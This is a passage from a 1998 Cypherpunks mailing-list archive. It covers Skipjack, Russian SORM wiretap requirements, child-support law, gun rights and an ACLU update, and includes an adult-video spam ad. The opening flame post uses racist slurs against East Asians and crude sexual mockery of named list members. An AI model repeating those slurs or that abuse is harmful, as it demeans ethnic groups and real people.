penetration fantasies by imagining that he is being victimized
by manly Nazis while trapped under the snowmobile that flipped
over while racing across the tundra, while still punishing
himself by the pain that results at night, when the ice-weasels
cum.
Joichi Ito (a play-on-words referring to Pearl Harbor
Computer's motto, "We Don't Eat [Ito] [Sushi] Dogs") as
the TCM sub-personality running the CypherNip Node, allows
TCM to indulge the S&M Bondage fantasies which are a 
prerequisite for buying land in NewAge California, while
telling himself that he's not *really* a fucking weirdo,
because he is only binding his feet.

BUMBO: And TCM's blatant redneck racism?
VAN DAMNNED: The Japanese CypherPunks Disturbed Male Node was
one of TCM's subconsious creations, designed to balance his
round-eyed, redneck imperialist side with the suppressed
slant-eyed gook in his California NewAge CosmicMakeUp.
Serious students of secular semantics soon saw that the
'Chop-chop' insults hurled by Tim May at his suppressed
errowMenace CyphelPunks Consistent Net Pelsonas were 
actually a pidgen-English variation on a red-white-and-blue/
stars-and-stripes Harley Davidson phrase, 'Chopper-Chopper'.

BUMBO: Uuhhh...it's getting a little deep. Is it medication
time again?
VAN DAMNNED: Think about it...
David Formosa, AKA ? the Platypus. It was an early sign of
the Chinc within struggling to get out, yet having to adopt
an Australian alias because TCM was not yet ready to face
butchering the English language without the excuse of being
drunk, or a victim of an imaginary disease named agraphia,
which was developed in a secret underground lavoratory by
Kent Crispin, who was desperately trying to keep Tim May
from consciously transposing his 'r's and 'l's, and realizing
that Pearl Harbor Computer's motto, "We don't eat dogs." was
not a reference to the disgusting dietary habits of Orientals,
but a veiled reference to the Reptilian Nazis who sated their
unnatural, carnal cuisenary desires by disguising themselves
as alligators crawling out of the Florida swamps to savagely
savour the sumptuous PuppyFlesh of TruthMongrel's distant
cousins, the FrenchConnection Poodles, whose heroin habits
were a survival mechanism designed to make them comfortably
numb as the Reptilian Nazis dined on their gonads, long
considered a delicacy by Space Aliens across the Universe,
turning them into Circle Of Eunuchs DoggieInitiates just
like Baby TruthMongrel, who was a Bitch trapped in a
Stud's body before being interrogated as a suspected member
of the Magic Circle by Gomez's Soviet dwarf, Hobbit uri
Kokoff? the Platypus, who was the inspiration for Tim May's
David 'The Australian Chinc' Formosa Consistent CypherPunks
Net Persona, completing the Magic Circle that began as a
defensive mechanism to thwart the Dark Forces that arise
every time that a Unix system is booted, releasing Daemons,
Zombies, Orphan Zombies, and the Dreaded Cron, enabling
students to face these imaginary creations of their drug-
addled minds with the comforting support of an equally
nonexistent creation by a mentally disturbed FrostBack
who bought into the drug-induced, Berzerkely Dungeons
and Dragons fantasies resulting from secret digital implants
into the brains of Bell Labs employees by Bill Gates in order
to promote his less versatile DOS Operating System as a safe
alternative to a Unix Operating System proliferating in the 
Bay Area, dangerously within reach of the Dark Forces in 
Oakland who were a threat to property values, in sharp contrast
to the safety of Redmond, Washington, where BadBillyG's secret
lover, Blanc Weber, kept the Dark Forces within the Author's
mind at bay, by resisting HisOrHer efforts to psychically 
peek up her skirt, to see if she was wearing panties.

BUMBO: If you're not going to take any medication, then
I *am*...
Baby! Come here...]




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: John Young <jya@pipeline.com>
Date: Thu, 25 Jun 1998 14:37:02 -0700 (PDT)
To: cypherpunks@toad.com
Subject: Skipjack HTM
Message-ID: <199806252136.RAA16853@dewdrop2.mindspring.com>
MIME-Version: 1.0
Content-Type: text/plain


We've transcribed a hardcopy of the 23-page SKIPJACK
doc into HTML:

   http://jya.com/skipjack-spec.htm  

  (350K, 41K text, 309K JPEG images of equations and figures)

A Zipped version:

   http://jya.com/skipjack-spec.zip  (295K)

Reports of typos in the tables welcomed.







From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Vladimir Z. Nuri" <vznuri@netcom.com>
Date: Thu, 25 Jun 1998 21:05:26 -0700 (PDT)
To: cypherpunks@toad.com
Subject: "deadbeat parents"
Message-ID: <199806260405.VAA23457@netcom3.netcom.com>
MIME-Version: 1.0
Content-Type: text/plain


apparently one of the 4 horsemen of the infocalypse...?!?!
whatever can be used as an excuse to take away rights, eh?


------- Forwarded Message

Date: Wed, 24 Jun 1998 15:18:11 -0500
To: believer@telepath.com
From: believer@telepath.com
Subject: IP: Clinton Signs New Deadbeat Parents Penalties into Law 

Source:  USIA

Clinton Signs New Deadbeat Parents Penalties into Law 
U.S. Newswire
24 Jun 9:06

 President Clinton Signs New Deadbeat Parents Penalties into Law
 To: National Desk
 Contact: White House Press Office, 202-456-2100

   WASHINGTON, June 24 /U.S. Newswire/ -- The following was released
today by the White House:

  Today, President Clinton will announce new statistics highlighting
the success of Administration child support enforcement efforts and
will sign into law tough new penalties for parents who repeatedly
refuse to pay child support.  At an Oval Office ceremony, the
President will announce that a new child support collection system
launched nine months ago has already located one million deliquent
parents, and the child support enforcement program established a
record 1.3 million paternities in 1997.  Overall, 68 percent more
child support was collected in 1997 than in 1992.  The bill he will
sign into law, the Deadbeat Parents Punishment Act of 1998, is based
on his 1996 proposal for tougher penalties for parents who repeatedly
fail to support children living in another state or who flee across
state lines to avoid supporting them.  Finally, the President will
reiterate his position that bankruptcy reform legislation should not
make it harder to collect child support and alimony.

  New Hire Directory Finds One Million Deliquent Parents.  Today, the
President will announce that the new National Directory of New Hires
had located one million deliquent parents since its October 1, 1997
launch.  The directory, proposed by the President in 1994, and
enacted as part of the 1996 welfare reform law, helps track parents
across state lines and withhold their wages by enabling child support
officials to match records of delinquent parents with wage records
from throughout the nation.  Approximately one-third of all child
support cases involve parents living in different states.  (See
attached chart)

  A Record Number of Paternity Establishments.  The President will
also announce that the child support enforcement program established
a record 1.3 million paternities in 1997, two and a half times the
1992 figure of 510,000.  Much of this success is due to the
in-hospital voluntary paternity establishment program begun by the
Clinton Administration in 1994, which encourages fathers to
acknowledge paternity at the time of the child's birth.

  A Record Increase in Child Support Collections.  In 1997, the state
and federal child support enforcement program collected a record $13.
4 billion for children, an increase of 68% from 1992, when $8 billion
was collected.  Not only are collections up, but the number of
families that are actually receiving child support has also
increased.  In 1997, the number of child support cases with
collections rose to 4.2 million, an increase of 48% from 2.8 million
in 1992.

  New Felony Penalties for Egregious Failure to Pay Child Support.
The President called for these tough new penalties in July 1996 and
again in his 1997 State of the Union address.  This new law creates
two new categories of felonies, with penalties of up to two years in
prison, for more egregious child support evaders:

   Traveling across state or country lines with the intent to evade
child support payments will now be considered a felony if the
obligation has remained unpaid for a period longer than one year or
is greater than $5,000.

   When the obligation has remained unpaid for a period of longer
than two years or is greater than $10,000, willful failure to pay
child support to a child residing in another state will be considered
a felony.

  This bill was sponsored in Congress by Representatives Hyde and
Hoyer and Senators DeWine and Kohl, and had overwhelming bipartisan
support in both houses.

  Responsible Bankruptcy Reform that Doesn't Hurt Children.  Finally,
the President will reiterate his position that bankruptcy reform
legislation should not make it harder to collect child support and
alimony.  The Administration will work with Congress to produce a
bankruptcy reform bill that asks responsibility of both creditors and
debtors, while stemming abuse.  In those discussions, the President
will continue to make protecting child support and alimony a top
priority.  The House and Senate bills still raise the concern that
additional debts will survive bankruptcy and compete with child
support and alimony payments for scarce funds.

 -0-
 /U.S. Newswire  202-347-2770/
 06/24 09:06

Copyright 1998, U.S. Newswire
- -----------------------
NOTE: In accordance with Title 17 U.S.C. section 107, this material is
distributed without profit or payment to those who have expressed a prior
interest in receiving this information for non-profit research and
educational purposes only. 
- -----------------------





**********************************************
To subscribe or unsubscribe, email:
     majordomo@majordomo.pobox.com
with the message:
     (un)subscribe ignition-point email@address
**********************************************
www.telepath.com/believer
**********************************************

------- End of Forwarded Message





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Maksim Otstavnov" <maksim@volga.net>
Date: Thu, 25 Jun 1998 11:19:42 -0700 (PDT)
To: cypherpunks@toad.com
Subject: SORM: New ex-KGB moves in telecom
Message-ID: <199806251819.LAA21699@geocities.com>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

To whom it may concern:

The text between [Start of translation] and [End of translation] lines below
is a verbatim translation of the two drafts of documents which are currently
in the state of approvement by the two Russian ministries: Federal Security
Service (FSB, one of the five special services inheriting to KGB) and State
Committee on Communications (Goskomsvyaz'). The originals (and comments) are
available at the Libertarium Webpages (www.ice.ru/libertarium/sorm).

Inconsistencies of the original texts (including but not restrictive to:
paragraph misnumbering, language vagueness etc.) are left intact. I left the
two Russian abbreviations: SORM for the System of effitient research measures,
and FSB for the Federal Security Service, to avoid confusion in future.

In short: if approved, the rules will provide exKGB with technical facility to
_directly_ and covertly wiretap _any_ information transmitted via
telecommunication networks including telephone, telegraph, Internet etc. and
there will be no means to ensure KGBists obtained a court warrant (required by
Constitution and other federal legislation) before wiretapping.

Any informed comments (of legal and technological, not emotional nature) from
both organisations and from individual experts are welcome.

I am grateful to all involved with obtaining the documents. Hope some day I
will be in a position to mention them by their names...

- - Maksim Otstavnov

[Start of translation]

Approved                                                   
Deputy Director Federal Security Service
A.A.Bespalov
"____"___________1998

Confirmed
"____"___________1998

TECHNICAL  REQUIREMENTS 
TO THE SYSTEM OF TECHNICAL MEANS 
PROVIDING FOR THE FULLFILMENT OF EFFICIENT RESEARCH MEASURES 
IN THE DOCUMENTAL TELECOMMUNICATIONS NETWORKS

Approved
Head of the Telecommunications Management
A.Yu.Rokotyan
"____"___________1998.

First Deputy to the Director General 
Of the Central Research Institute 
of the State Telecommunications of Russia
Yu.A.Alekseev
"____"___________1998.

1. PURPOSE

1.1. The system of technical means destined to provide for the system of
efficient research measures (SORM) in the networks of the documental
telecommunications (NDTC) is being arranged at the basis of the Russian
Federation legislation and is meant to provide for technical support of the
above research measures in the telecommunications networks which are used for
supplying customers with telematic services, data transmission services, and
access to the world global information network of INTERNET. 

1.2 The actual technical requirements (TR) concern all NDTC regardless of
their forms of ownership formed previously or being currently formed according
to the Russian State Communications Committee licenses. 

1.3. SORM should provide for reading of all information (both incoming and
outgoing) belonging to the specific subscribers of the network(s) in question.

1.4. The actual TR should be observed regardless of what means of
information protection may be used in the NDTC.

1.5. The actual TR should be observed while providing additional services to
the NDTC subscribers.

1.6. The actual TR should be observed for each individual subscriber
regardless of the type of his connection to the DTC networks (individual or
collective). 

2. SET OF EQUIPMENT The set of SORM equipment should include:

  hardware and software means (HSM) providing for the requirements
fulfillment by SORM, these means should be part of the distant control center
(DCC) -  HSM SORM DCC;

  hardware and software means (HSM) providing for the requirements
fulfillment by SORM these means should be part of the NDTC node equipment -
HSM SORM NDTC;

  communication channel (communication lines and channeling hardware)
providing for establishing of communication between HSM SORM DCC and HSM
SORM NDTC; 

Note: The channeling hardware should be part of the HSM SORM NDTC equipment. 

  SORM software security and confidentiality protection means.

3. GENERAL REQUIREMENTS FOR THE SORM ORGANIZATION

3.1. NDTC SORM management should be controlled from the DCC by way of its
cooperation with the HSM SORM DCC via communication channels providing for
controlling commands transmission from the DCC to HSM SORM NDTC and for
information transmission from HSM SORM NDTC to the DCC. 

3.2 SORM should provide for transmission of the following information from the
HSM SORM NDTC to the DCC: 

  about the HSM SORM NDTC readiness; 

  about the results of DCC commands fulfillment; 

  about unauthorized interference with the HSM SORM NDTC work. 

3.3. SORM should provide for transmission to the DCC the NDTC
subscribers data base with the following information about subscribers at the
request of the DCC operator: 

  registration date in the DTC networks; 

  electronic address; 

  registration address; 

  additional services provided (including internet roaming (and voice
communication services). 

3.4. At the DCC command SORM should provide for receiving of the following
information pertaining to any individual user: 

  statistic information reading; 

  reading of information (both incoming and outgoing) belonging to specific
subscribers. 

Note: This command may be documented by the communications operator. 

3.5. SORM should provide for determination of: 

  subscriber's telephone number if he uses common carrier telephone line
(providing this line allows for this) for using telematic services and data
transmission;

  subscriber's electronic address if the latter uses other telecommunication
networks for using telematic services and data transmission. 

3.6. While reading statistical information SORM should provide for
transmission of the following information to the DCC HSM SORM NDTC: 

  period of work in the NDTC;

  telephone or commuted telephone line number or network address (of an other
network) used for NDTC access; 

  network addresses used for reception or transmission of information via
NDTC. 

3.7. While reading information SORM
should provide for transmission of the following information to the DCC HSM
SORM NDTC: 

  period of work in the NDTC; 

  telephone or commuted telephone line number or network address (other
network address) used for NDTC access; 

  real-time information transmitted via NDTC and belonging to specific
subscribers. 

3.8. The SORM reaction time from the moment of DCC command transmission to the
moment of its fulfillment confirmation by the HSM SORM NDTC reception should
not exceed 30 seconds (excluding the communication services access
discontinuation). 

4. HSM SORM NDTC AND HSM SORM DCC COMMUNICATION  INTERFACE 

4.1. Communication between SORM and DCC should be
conducted via the data transmission channel. 

4.2. Data transmission channel reservation should be provided. 

4.3. Switch to the reserve channel should be provided in case of the main
channel fault. 

4.4. The information exchange should be conducted via isolated communication
channel in a duplex regime at a speed not less than maximally allowed for the
NDTC subscribers. 

4.5. Interface of communication with the channeling equipment should comply
with the ITTU recommendations V.36, V.24, G.703. 

4.6. Protocol of digital data exchange between SORM and DCC should comply with
the X.25 ITTU recommendation (edition of 1995) for single chain LAPB
procedure. 

Note: When protocols used for the networks information exchange differ from
those recommended by the ITTU X.25 (such as TCP/IP), the protocol of
information exchange between SORM and DCC may differ from the protocol
mentioned in paragraph 4.6. as agreed with the FSB of Russia and the network
administration. 

4.7. The protocol of connection between SORM and DCC (the type of service
information, SORM/DCC interaction algorithm, arrangement of the information
transmission) should be defined in the process of SORM software development by
agreement with the FSB of Russia. 

5. SORM EFFICIENCY CONTROL 

5.1. Functional control of the SORM hardware and software efficiency against
the background of the NDTC equipment functioning should be provided for during
the exploitation. 

5.2. DCC should receive information concerning faults interfering with the
work of the NDTC SORM. 

5.3. Performance control of the information exchange channels between SORM and
DCC should be provided for. In case of the damage of information exchange
equipment data transmission should be cancelled and a corresponding message
should be transmitted to the maintenance personnel while automatic switch on
to the reserve channel should be fulfilled. 

6. UNAUTHORIZED INFORMATION ACCESS CONTROL 

6.1. The possibility of unauthorized interference with the process of
functioning and interaction between the HSM SORM NDTC and HSM SORM DCC should
be excluded. 

6.2. The possibility of unauthorized access to the data and software
providing for the HSM SORM NDTC interaction should be excluded. 

6.4. DCC should receive reports on all attempts of unauthorized access and
interference with the HSM SORM NDTC functioning. 

6.5. Information exchange between SORM and DCC should be secured. 

7. SORM INITIALIZING AND RESTART 

7.2. In case of SORM node software restart the information about this fact
should be transmitted to the DCC. 

7.3. Technological conditions of the SORM node software restart should
include the procedure of HSM SORM NDTC restart. 

7.4. A possibility of restarting part of the software controlling the work of
the HSM SORM NDTC should be provided for at the DCC command. 


_____________________________________________________________________________

Approved 
Deputy Director 
of the Federal Security Service 
of the Russian
Federation 
A.A.Bespalov 
"____"___________1998

Confirmed
"___"___________1998

THE ORDER OF IMPLEMENTATION OF THE SYSTEM OF THE EFFICIENT RESEARCH MEASURES
IN THE DOCUMENT TELECOMMUNICATIONS NETWORKS 

First Deputy to the Director General 
of the Central Research Institute 
of the State Telecommunications of Russia 
Yu.A.Alekseev

"____"___________1998


Administrations of the telecommunications documental networks (DTC) including
the services of data transmission, telematic services, Internet informational
resources access services that are guided by the "Technical  Requirements To
The System Of Technical Means Providing For  The Fullfilment Of Effecient
Research Measures In The Documental Telecommunications" should conduct the
following technical and administrative operations. A plan of measures to be
taken in order to implement the system of efficient research measures (SORM)
in the network consisting of two stages (the first stage may be missing)
should be developed and coordinated with the Federal Security Service of the
Russian Federation. 

The first stage - implementation of limited functions SORM using standard
equipment of the telecommunications provider, experimental running of the
system and evaluation of its compliance with the main technical SORM
requirements. 

The second stage - full fledged SORM implementation considering the results of
the experimental exploitation. The first stage provides for: 

1. Development and coordination with the FSB of the technological scheme and
SORM functioning algorithms at the telecommunications operator's network based
on the technical requirements. 

2. Correction if necessary of SORM technical requirements considering the
results of the first stage implementation. 

3. Development of the list of SORM hardware and software used at the first
stage and according to the results of the first stage (stating type, cost,
supply conditions and payer for each item). 

4. Preparation of proposals and coordination with the FSB of Russia of the
necessary communication protocols for data exchange between SORM equipment and
standard equipment of the telecommunications provider if the provider complies
with the SORM technical requirements (stage 2). 

5. Purchase and delivery of the SORM equipment in accordance with the list
provided by p. 3 

6. Allocation of necessary technical means for checking and tuning of the SORM
software at the provider's equipment. 

8. Organization of the intercity communication line between
telecommunications operator and the DCC.

9. Preparation of the exploitation and technical documentation for the SORM
including the regulations for the duty services interaction. 10. Testing and
tuning of the SORM hardware and software during interaction with the
telecommunications operator standard equipment. 

The first stage is completed as the SORM acceptance report is signed and it is
accepted for experimental exploitation as the result of the joint tests (FSB
as the contractor and the telecommunications operator as the performer.)

The second stage provides for:

1. Development of the SORM requirements for the telecommunications operator
equipment based on the "Technical  Requirements To The System Of Technical
Means Providing For  The Fulfillment Of Efficient Research Measures In The
Documental Telecommunications" (adjusted if necessary according to the results
of the first stage) containing the list of: 

  hardware and software means providing for the implementation of the SORM
requirements and included into the equipment of the node (nodes) of DTC
network - HSM SORM NDTC; 

  hardware and software means providing for implementation of the SORM
requirements and included into the DCC equipment - HSM SORM DCC; 

  type of channel for communication between NDTC and HSM SORM DCC; 

  type of equipment for the communication channel between the HSM SORM NDTC
and HSM SORM DCC; 

  the data exchange velocity between the HSM SORM NDTC and HSM SORM DCC; 

  protocol of the data exchange in the communication channel between HSM SORM
NDTC and HSM SORM DCC; 

  protocol of junction between HSM SORM NDTC and HSM SORM DCC; 

  information security and privacy protection software for the SORM.
Telecommunications operator should coordinate technical requirements with the
FSB of Russia. 

2. The specification of the specific hardware and software that should be
included as part of the standard equipment of the telecommunications operator
and of the DCC (stating type, cost, supply conditions and payer for each item)
is compiled according to the technical requirements. The specification is
coordinated by the telecommunications operator with the FSB of Russia organs. 

3. Technical design development for the SORM implementation by the
telecommunications operator's enterprise is fulfilled by the organization
licensed for the fulfillment of design works by the order of the
telecommunications operator. 

4. Development of the SORM technical exploitation documentation  including
regulation for duty services interaction. 

5. SORM equipment assembling at the telecommunications operator's enterprise
is fulfilled by the organization licensed for the fulfillment of assembling
works by the order of the telecommunications operator. 

6. Testing and tuning of the SORM software at the telecommunications
operator's equipment. 

7. Conducting joint SORM tests (FSB of the Russian Federation as a contractor
and the telecommunications operator as a performer). The second stage is
concluded with the SORM industrial exploitation acceptance report which is
jointly approved by the telecommunications operator management and the FSB of
Russia representatives. 

[End of translation]

-----BEGIN PGP SIGNATURE-----
Version: PGP for Personal Privacy 5.0.1iRu
Charset: noconv

iQCVAwUBNZJq7XGCEHWOiJDhAQE6cwP9Fm9c8js94liPIbQa+UHUAsPFuOAmEUQd
QsMIlNgJjTtRvmoDZS6fjxYbLgbO4imEOtsKEeIMJsZqX8UC0er2tk7VO3eK0968
EzM8w3+t8yFLB98/tWGE9Ghz2HiZh/ywoRiGX8Y08ZkKitYgOk/Aq4EmBHVQp92X
ePOimdtAtdY=
=BdJi
-----END PGP SIGNATURE-----
-- Maksim Otstavnov <maksim@volga.net> http://www.ice.ru/otstavnov/
--   - chief, Labs of Civil & Financial Crypto
--   - editor, "CompuNomika" monthly
--   - maintainer of The Russian PGP HomePage




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Bill Frantz <frantz@netcom.com>
Date: Thu, 25 Jun 1998 23:32:36 -0700 (PDT)
To: cypherpunks@toad.com
Subject: Re: Skipjack extensibility
In-Reply-To: <199806250705.JAA31711@basement.replay.com>
Message-ID: <v0311077bb1b8f7dc3b54@[207.94.249.99]>
MIME-Version: 1.0
Content-Type: text/plain


At 11:05 PM -0800 6/24/98, Anonymous wrote:
>NSA made a claim that Skipjack couldn't be extended past 80 bits of key. Most
>plausible explanation to my mind is that they're lying. Second is that
>there is
>an attack against a class of Skipjack-like ciphers that requires only a few
>plaintexts and 2^80 operations. Third is that some common key-lengthening
>tricks like those for 2-key-3DES, DES-X, and DEAL fail when applied to
>Skipjack. I can hardly fathom one resistant to all three, but I guess it's
>possible with NSA.

3DES is useful because DES does not form a group.  To the best of my
knowledge, Skipjack has not been analysed in this area (outside of Never
Say Anything).


-------------------------------------------------------------------------
Bill Frantz       | If hate must be my prison  | Periwinkle -- Consulting
(408)356-8506     | lock, then love must be    | 16345 Englewood Ave.
frantz@netcom.com | the key.     - Phil Ochs   | Los Gatos, CA 95032, USA






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Jean-Francois Avon" <jf_avon@citenet.net>
Date: Thu, 25 Jun 1998 22:35:50 -0700 (PDT)
To: "Cypherpunks" <cypherpunks@toad.com>
Subject: RE: CIA 4 Nags: Hackers Crypto Y2K Foreigners
Message-ID: <199806260547.BAA05417@cti06.citenet.net>
MIME-Version: 1.0
Content-Type: text/plain



On Thu, 25 Jun 1998 12:18:44 -0700, Ernest Hua wrote:

>Now, if, next week, someone demonstrates a gun or some other physical
>offensive weapon easily manufacturable using off the shelf parts at $10
>a pop with less than $50 start-up costs (these numbers must include the
>entire mechanism; in the case of a gun, it would include the bullets).


Operational homemade firearms are often found to have been built by convicts in high security prisons...

Check with the NRA or with the NFA (Canada)
 e-mail: nfadat@telusplanet.net   Web site: http://nfa.ca/

Ask David Tomlinson for info on the topic, he'll tell you...

Ciao

jfa







Definition:  FACISM: n.:  a political and economic movement, strongly nationalistic, magnifying the rights of the state as opposed to those of the individual, in which industry, though remaining largely under private ownership, and all administrative
political units, are controlled by a strong central government.
        -------------------------------------------------
"One of the ordinary modes by which tyrants accomplish their purpose, without resistance, is by disarming the people and making it an offense to keep arms".  - Joseph Story, U.S. Supreme Court Justice.
        -------------------------------------------------
the German gun control laws were enacted by the "liberal" Weimar Republic government that preceded Hitler, and were a strong aid to his coming to power -- because they disarmed Hitler's opponents, and Hitler's adherents ignored them -- as criminals have always ignored gun control laws.

Disarming the public is a frequent first step toward dictatorships and genocides.  Once the disarming is complete, the public is helpless against those who have the guns.        -------------------------------------------------

PGP keys: http://bs.mit.edu:8001/pks-toplev.html
PGP ID:C58ADD0D:529645E8205A8A5E F87CC86FAEFEF891 
PGP ID:5B51964D:152ACCBCD4A481B0 254011193237822C



From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: deal447@hotmail.com
Date: Fri, 26 Jun 1998 04:03:32 -0700 (PDT)
Subject: Don't Miss These!
Message-ID: <QQevku10650.199806261101@relay3.UU.NET>
MIME-Version: 1.0
Content-Type: text/plain


Attention!
Warning! Adults Only!                    Warning! Adults Only!

If you are under 21 years of age, or not interested in sexually 
explicit material... please hit your keyboard delete button now
and please excuse the intrusion.  To REMOVE your name from our email list, simply send us email with REMOVE in the subject line.  You need not read any further!

Available NOW for only $9.95!  Next 10 Days Only!

WORLD RECORD SEX!

Be There!  See It Now On Video!  Unbelievable ...But True!

You Won't Believe Your Eyes!!!  [As Seen on the Howard Stern Show]

"The World's Biggest Gang Bang"

See sexy  Annabel Chong as she sets the world Gang Bang Record
in this fantastic video documentary that chronicles her 24 hour
sexathon with 251 men engaging in sexual intercourse and oral
sex with her!  Don't worry, you won't have to stay up 24 hours
to watch it all.  We've selected only the most exciting and red
hot scenes for you...all in breathtaking living color with plenty of
extreme close-ups!  This video is guaranteed to knock your socks
off and leave you breathless!  You've never seen anything like it!
Annabel takes on five men at a time!  90 minutes! Order Today!
Only $9.95 plus $3 shipping and handling [Total $12.95].


"GANG BANG II"
The Record Breaker!!!  Starring Jasmin St. Claire!

See Beautiful and Voluptious Jasmin St. Claire shatter Annabel's
gang bang record by taking on 300 men in one 24 hour sex session!
You won't believe your eyes at all the hot firey action that you will
see as the new world record is established before your eyes as
Jasmin  takes on five men at a time for sexual intercourse and
oral sex!  Your friends will break down your door to see this video!
You'll be the most popular guy in town!  The action is truly unreal 
and you will see the best of it in living life-like color!  Order Today
and see Jasmin break the record!  90 minutes.  Only $9.95 plus
$3 shipping and handling [total $12.95].

Also Available...

The Uncensored Authentic Underground...
Pamela Anderson Lee & Tommy Lee
Sex Video Tape!

Everyone is talking about this exciting video!  See Pam and 
Tommy engaging in sexual intercourse and oral sex in the car,
on the boat and much, much more!  A  real collectors video! 30 minutes.
Only $9.95 plus $3 shipping and Handling [total $12.95]

"Tonya Harding Wedding Night Sex Video"
Now see the beautiful Ice Skating Shame of the Olympics
Tonya Harding engaging in sexual intercourse and oral 
sex on her wedding night with husband Jeff Gillooly!
This "Bad Girl" is Hot!  Don't miss this video! 30 minutes.
Only $9.95 plus $3 shipping and handling [total $12.95]

"Traci...I Love You"  Starring Traci Lords
Now see the most beautiful and popular porn star in her last
adult video before she hit the big time!  It's the blockbuster of
the year...sensual...fiery and exposive!  Traci Lords in her most
erotic and controversial film ever!  Don't Miss It!  90 minutes.
Only $9.95 plus $3 shipping and handling [total $12.95]

EMAIL SPECIAL!

ORDER ANY FOUR VIDEOS AND GET THE FIFTH ONE FREE!!!

Your order will be shipped via First Class Mail. All Shipments in plain unmarked wrapper.
For Priority Mail - Add $5
For Overnight Express - add $15

You can order by Phone, Fax, Mail or Email.

We accept all Major Credit Cards and checks by phone or fax.
Visa - MasterCard - American Express - Discover

10 Day Money Back Guarantee!  We know that you will be pleased with these Videos!

To Email your order - DO NOT HIT REPLY ON YOUR KEYBOARD

Send email to our special email address below:

brenda468@juno.com

[Note: If you order by email and do not receive an email acknowledgement within 24 hours, please phone our office at
718-287-3800]

Phone our office 9am to 10 pm [eastern time]

[718] 287-3800 to Order By Phone for FASTEST SERVICE!

 We can accept your credit card or check by phone

Fax Your Order 24 hours per day  to  [718] 462-5920
You can fax your credit card information or your check

Order by mail by sending $12.95 per video,  cash, check, money order or major credit card [Visa, MasterCard, American Express or Discover] to

TCPS, INC.
4718  18th Ave.  Suite 135
Brooklyn, NY 11204

Make Checks & Money Orders Payable to TCPS, Inc.
New York State Residents Please Add 85 cents for Sales Tax per Video!

You must be over 21 years of age to order and give us your date of birth with your order!

The Following Order Form is for Your Convenience!

.............................................................................................................




Please ship me the following video tape[s]!

Qty___________Annabel Chong "World's Biggest Gang Bang"

Qty__________"Gang Bang II" Jasmin St. Claire

Qty___________"Pamela & Tommy Lee Sex Video Tape"

Qty_________   "Tonya Harding Wedding Night Sex Video Tape"

Qty__________"Traci I Love You" Traci Lords

at $9.95 each plus $3.00 for shipping and handling per tape
[$12.95 per video or "SPECIAL $51.80 for ALL FIVE"!

Credit Card #______________________________Exp Date___

I hereby represent that I am over 21 years of age.  
My date of birth is_________________________________

Signature______________________________________________

Ship to:  Name_______________________________________

Address____________________________________________

City________________________State___________Zip________

Area Code and Home Phone  [    ]___________________________

Fax # [     ]______________________________________________

Email Address___________________________________________

To remove your name from our mailing list, send us an email with 
remove in the subject line.  This is a one time offer and you should not hear from us again!

FOREIGN ORDERS -Add $15us if you desire Air Parcel Post Shipment.  We ship all over the world.

By deleting your unwanted E-Mail you waste one keystroke, yet
by throwing away paper mail you waste our planet!  SAVE THE
TREES and support internet E-Mail instead of paper mail!

[C] Copyright TCPS 1998















































From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Anonymous <nobody@remailer.ch>
Date: Fri, 26 Jun 1998 01:56:34 -0700 (PDT)
To: cypherpunks@toad.com
Subject: ACLU Action Update 06-25-98 -- Victory!  (fwd)
Message-ID: <19980626091418.18178.qmail@hades.rpini.com>
MIME-Version: 1.0
Content-Type: text/plain


---------------------------------------------------------------
06-25-98
ACLU Action Update
----------------------------------------------------------------

TO:	 Action Network
FR:	 Penny Crawley, Cyber Organizer (pcrawley@aclu.org)
DT:	 June 25, 1998

1. Victims' Rights Amendment
2. Child Custody Protection:/"Teen Endagerment" Act
3. New E-mail address

1.  We did it! With both the House and Senate now adjourned for the Fourth of
July recess,  "Amend the Constitution Month" in Congress has come to an end a
victory: the Constitution remains intact!

The Senate Judiciary met briefly this morning to consider the so-called
Victims' Rights Amendment (SJ Res. 44), the last of the three amendments
targeted by the Republican leadership for passage during June.  Although there
was a brief debate on this measure, the Committee adjourned for the recess
without taking action.  It is anticipated that it will take up the proposed
amendment shortly after Senators return to Washington on July 6.

A new website can be found on the Internet containing editorials and other
resources (testimony, position statements and letters to Congress) on why a
constitutional amendment is the wrong way to assist victims of crime.  The
site is located at:

http://soiroom.hyperchat.com/celestin/vrainfo.html

ACTION NEEDED:

A. Urge your U.S. Senators to honor the founding of our nation this Fourth of
July by preserving the original Bill of Rights and voting against the victims'
rights amendment by sending a FREE FAX from the ACLU website at:

http://www.aclu.org/action/victim.html

B. Because no advocacy tactic is more effective than personal interaction,
push home the point about preserving the Bill of Rights during any public
appearance your Senators make during the Fourth of July recess. 

2.  Child Custody Protection/"Teen Endangerment" Bill

Like the Victims' Rights amendment, action on the anti-choice Child Custody
Protection Act (S 1645/HR 3682), which was also on today's agenda in the
Senate Judiciary Committee, was postponed when the Committee adjourned for
recess.  It, too, is expected to be taken up when Senators return to the
Capitol.

ACTION NEEDED:

Urge your Senators to oppose this misguided bill, which would intrude into
Americans' private relationships, isolate young women by discouraging them
from seeking the caring support of a trusted adult, and endanger their lives
by forcing them to travel alone to an abortion provider and back home after
the surgery.  Send a FREE FAX from the ACLU website at:

http://www.aclu.org/action/custody.html

3. My e-mail address has changed!  All future e-mail should be sent to:

pcrawley@aclu.org 

Please update any listings in your address book to reflect the change.  (My
AOL address will remain active until July 31, 1998.)

----------------------------------------------------------------
ONLINE RESOURCES FROM THE ACLU NATIONAL OFFICE
----------------------------------------------------------------

ACLU Freedom Network Web Page:  http://www.aclu.org.  
Constitution Hall on America Online (keyword ACLU)

----------------------------------------------------------------
ACLU Action Update
ACLU National Washington Office
122 Maryland Avenue NE 
Washington, DC 20002

To subscribe to the ACLU Action List, send a message to majordomo@aclu.org
with "subscribe action" in the body of the message. To end your
subscription, send a message to majordomo@aclu.org with "unsubscribe
action" in the body of the message.

For general information about the ACLU, write to info@aclu.org
This Message sent to
action





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "S. M. Halloran" <mitch@duzen.com.tr>
Date: Thu, 25 Jun 1998 23:24:55 -0700 (PDT)
